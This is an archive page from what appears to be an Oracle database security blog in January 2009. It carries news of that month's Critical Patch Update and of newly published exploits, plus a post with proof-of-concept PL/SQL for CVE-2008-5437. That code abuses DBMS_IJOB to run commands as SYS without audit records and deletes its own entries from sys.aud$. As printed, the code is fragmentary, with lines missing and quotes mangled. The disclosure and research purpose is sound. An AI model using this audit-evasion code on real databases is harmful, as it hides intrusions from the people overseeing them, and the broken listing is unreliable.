Archive for Januar, 2009

Proof-of-concept how to bypass Oracle Auditing using DBMS_IJOB

Freitag, Januar 16th, 2009

Here is the proof of concept code for the issue in dbms_ijob [CVE-2008-5437] from Volker Solinus, a really smart DBA, my former colleague from Oracle Consulting Germany.

A different bug concerning Auditing reported by us is still open. Oracle Auditing alone is not sufficient because there are various ways to bypass it. . Often it is better to use a 3rd-party solution like Hedgehog from Sentrigo.

— Bypassing Oracle Auditing
— Everything executed via dbms_ijob (granted to DBAs by default)
— will not appear in the Oracle auditing
— by Volker Solinus

jj    integer := 666666;    — job number
JOB =>        jj,
LUSER =>    ‚SYS‘,
PUSER =>    ‚SYS‘,
CUSER =>    ‚SYS‘,
NEXT_DATE =>    sysdate,
INTERVAL =>    null,
BROKEN =>    false,
WHAT =>        ‚
jj    integer := ‚||jj||‘;
execute immediate “alter system archive log current“;
delete from sys.aud$ where obj$name = “DBMS_IJOB“;
ENV =>        hextoraw(‚0102000200000000‘));;
exception when others then
if sqlcode=-12011 then
end if;
After applying the January CPU 2009 you will get the following error message:

ERROR at line 1:
ORA-12718: operation requires connection as SYS
ORA-06512: at line 32

First exploits (non-DB) for January 2009 CPU

Donnerstag, Januar 15th, 2009

Joxean Koret has published the first exploit for remote code execution on Oracle Secure Backup 10g. Having the name „Secure“ in the title is probably not always the smartest idea…

And an additional exploit for Oracle TimesTen from Joxean too.

Exploits for October 2008 CPU + whitepaper „Different ways to guess SIDs“ published

Donnerstag, Januar 15th, 2009

In the first week of January Alexandr Polyakov from has published 3 exploits on the website of

Alexandr has published also a really good whitepaper how to guess the SID of Oracle databases. Some of the bugs (database control/database vault control) and techniques (like the concept sidguessing) were found / developed first by Red-Database-Security.

The whitepaper describes

  • Getting the SID and Servicename
  • Guessing the SID (default SID, typical SID, dictionary, Bruteforce)
  • Searching the SID (Database Control, XDB,…)
  • Getting the SAP SID
  • Getting the SID via SQL Injection
  • Getting the SID via the target system (Registry, FTP, MSSQL, OS account)
  • Getting the SID from the company network (Sniffing, another DB, …)

Oracle Critical Patch Update January 2009 is out

Dienstag, Januar 13th, 2009

Oracle just released the January 2009 CPU.

The database part of this CPU contains fixes for 10 vulnerabilities in the Oracle database. This time Oracle fixed 3 of our vulnerabilities (2 in the database) and 1 in JDeveloper (reported 2005, CVE-2008-2623).

15 researchers are mentioned in this report (2 from Red-Database Security (Franz Hüll and I). The usual suspect (Esteban, Joxean and David) are part of the reporters too.

The most critical bug (CVE-2008-5437) allows any user with execute privileges on dbms_ijob (e.g. DBA or hacker/user with DBA privs) to bypass Oracle Auditing completely. This means no traces in the AUD$ and/or the operating system! All databases are affected.

Before I will release details for this issue I must check the patches from Oracle what bug Oracle has fixed. I reported 2 different bugs to Oracle where you can bypass Auditing. The exploit and idea for one of the bugs came from my former Oracle colleague Volker Solinus.

The second bug from us  is a SQL injection bug in  DBMS_STREAMS_AUTH (CVE-2008-4015). Here it is possible to become DBA.

More details within the next days.